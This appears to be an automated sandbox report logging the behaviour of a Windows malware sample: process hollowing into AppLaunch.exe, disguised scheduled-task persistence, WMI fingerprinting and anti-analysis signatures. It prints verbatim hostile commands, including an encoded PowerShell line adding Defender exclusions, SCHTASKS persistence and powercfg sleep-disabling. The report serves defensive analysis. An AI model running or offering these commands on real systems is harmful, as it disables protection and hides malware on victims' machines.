cmdline powershell -EncodedCommand "PAAjADcATwB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AG4AYwBMAHkANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBPAFoASAB2AGEAdQBLAEwAUwBxAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMABmADEAcAB0ADMAYQAjAD4A"
cmdline SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Processor
wmi SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://gcc.gnu.org/bugs/):
description task schedule rule schtasks_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names. rule vmdetect_misc
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2612
process_handle: 0x00000074
0 0

NtTerminateProcess

 status_code: 0x00000000
process_identifier: 2612
process_handle: 0x00000074
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2100
process_handle: 0x000007d0
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2100
process_handle: 0x000007d0
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 1404
process_handle: 0x000007d8
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 1404
process_handle: 0x000007d8
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2068
process_handle: 0x0000078c
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2068
process_handle: 0x0000078c
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 0
process_handle: 0x0000078c
0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 0
process_handle: 0x0000078c
1 0 0

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 1108
process_handle: 0x000002ec
0 0
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7447" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
wmi SELECT * FROM Win32_Processor
wmi SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
buffer Buffer with sha1: 6e6810493e9bd1a1ebcc555102a4c81ce5f2c6cd
buffer Buffer with sha1: bb7d0ed2ac5bab0b4af8f1de87fff55bd3a141ef
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00006430
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description AppLaunch.exe tried to sleep 2728196 seconds, actually delayed analysis time by 2728196 seconds
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7447" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
cmdline SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Process injection Process 2556 manipulating memory of non-child process 2612
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 114688
process_identifier: 2612
process_handle: 0x00000074
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2648
process_handle: 0x00000074
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 1108
process_handle: 0x00006430
1 1 0
Process injection Process 2556 called NtSetContextThread to modify thread in remote process 2648
Process injection Process 2648 called NtSetContextThread to modify thread in remote process 1108
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 4126952
registers.edi: 0
registers.eax: 4199584
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000070
process_identifier: 2648
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3013312
registers.edi: 0
registers.eax: 4220670
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000643c
process_identifier: 1108
1 0 0
Process injection Process 2556 resumed a thread in remote process 2648
Process injection Process 2648 resumed a thread in remote process 1108
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000070
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x0000643c
suspend_count: 1
process_identifier: 1108
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2616
thread_handle: 0x00000070
process_identifier: 2612
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000074
1 1 0

NtGetContextThread

 thread_handle: 0x00000070
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 114688
process_identifier: 2612
process_handle: 0x00000074
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2612
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
3221225496 0

CreateProcessInternalW

 thread_identifier: 2652
thread_handle: 0x00000070
process_identifier: 2648
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000074
1 1 0

NtGetContextThread

 thread_handle: 0x00000070
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1490944
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000074
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00400000
process_identifier: 2648
process_handle: 0x00000074
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2648
process_handle: 0x00000074
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 4126952
registers.edi: 0
registers.eax: 4199584
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000070
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x00000070
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

 thread_identifier: 740
thread_handle: 0x0000643c
process_identifier: 1108
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00006430
1 1 0

NtGetContextThread

 thread_handle: 0x0000643c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1108
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00006430
1 0 0

WriteProcessMemory

 buffer:
base_address: 0x00400000
process_identifier: 1108
process_handle: 0x00006430
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 1108
process_handle: 0x00006430
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3013312
registers.edi: 0
registers.eax: 4220670
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000643c
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x0000643c
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x00000144
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x000001b8
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x000001f4
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x00000274
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x000002dc
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x0000034c
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x0000036c
suspend_count: 1
process_identifier: 1108
1 0 0

CreateProcessInternalW

 thread_identifier: 2748
thread_handle: 0x00000370
process_identifier: 2744
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "cmd.exe" /C powershell -EncodedCommand "PAAjADcATwB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AG4AYwBMAHkANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBPAFoASAB2AGEAdQBLAEwAUwBxAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMABmADEAcAB0ADMAYQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
filepath_r:
stack_pivoted: 0
creation_flags: 134742016 (CREATE_NO_WINDOW|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000380
1 1 0

NtResumeThread

 thread_handle: 0x000004b0
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x0000076c
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x000007b0
suspend_count: 1
process_identifier: 1108
1 0 0

NtResumeThread

 thread_handle: 0x000007c4
suspend_count: 1
process_identifier: 1108
1 0 0

CreateProcessInternalW

 thread_identifier: 800
thread_handle: 0x000007cc
process_identifier: 1404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 134742016 (CREATE_NO_WINDOW|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000007d0
1 1 0

CreateProcessInternalW

 thread_identifier: 1264
thread_handle: 0x000007d0
process_identifier: 2100
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7447" /TR "C:\ProgramData\Dllhost\dllhost.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 134742016 (CREATE_NO_WINDOW|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000007cc
1 1 0

CreateProcessInternalW

 thread_identifier: 2800
thread_handle: 0x000000f4
process_identifier: 2804
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -EncodedCommand "PAAjADcATwB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AG4AYwBMAHkANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBPAFoASAB2AGEAdQBLAEwAUwBxAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAMABmADEAcAB0ADMAYQAjAD4A"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f8
1 1 0

CreateProcessInternalW

 thread_identifier: 2892
thread_handle: 0x000000f8
process_identifier: 2888
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\powercfg.exe
track: 1
command_line: powercfg /x -hibernate-timeout-ac 0
filepath_r: C:\Windows\system32\powercfg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f4
1 1 0

CreateProcessInternalW

 thread_identifier: 2936
thread_handle: 0x000000f4
process_identifier: 2932
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\powercfg.exe
track: 1
command_line: powercfg /x -hibernate-timeout-dc 0
filepath_r: C:\Windows\system32\powercfg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f8
1 1 0

CreateProcessInternalW

 thread_identifier: 2980
thread_handle: 0x000000f8
process_identifier: 2976
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\powercfg.exe
track: 1
command_line: powercfg /x -standby-timeout-ac 0
filepath_r: C:\Windows\system32\powercfg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f4
1 1 0

CreateProcessInternalW

 thread_identifier: 3028
thread_handle: 0x000000f4
process_identifier: 3024
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\powercfg.exe
track: 1
command_line: powercfg /x -standby-timeout-dc 0
filepath_r: C:\Windows\system32\powercfg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f8
1 1 0

CreateProcessInternalW

 thread_identifier: 2052
thread_handle: 0x000000f8
process_identifier: 3068
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\powercfg.exe
track: 1
command_line: powercfg /hibernate off
filepath_r: C:\Windows\system32\powercfg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f4
1 1 0

NtResumeThread

 thread_handle: 0x000002b4
suspend_count: 1
process_identifier: 2804
1 0 0

NtResumeThread

 thread_handle: 0x00000308
suspend_count: 1
process_identifier: 2804
1 0 0

NtResumeThread

 thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2804
1 0 0

NtResumeThread

 thread_handle: 0x000004c4
suspend_count: 1
process_identifier: 2804
1 0 0

CreateProcessInternalW

 thread_identifier: 2220
thread_handle: 0x000000f4
process_identifier: 2196
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000f8
1 1 0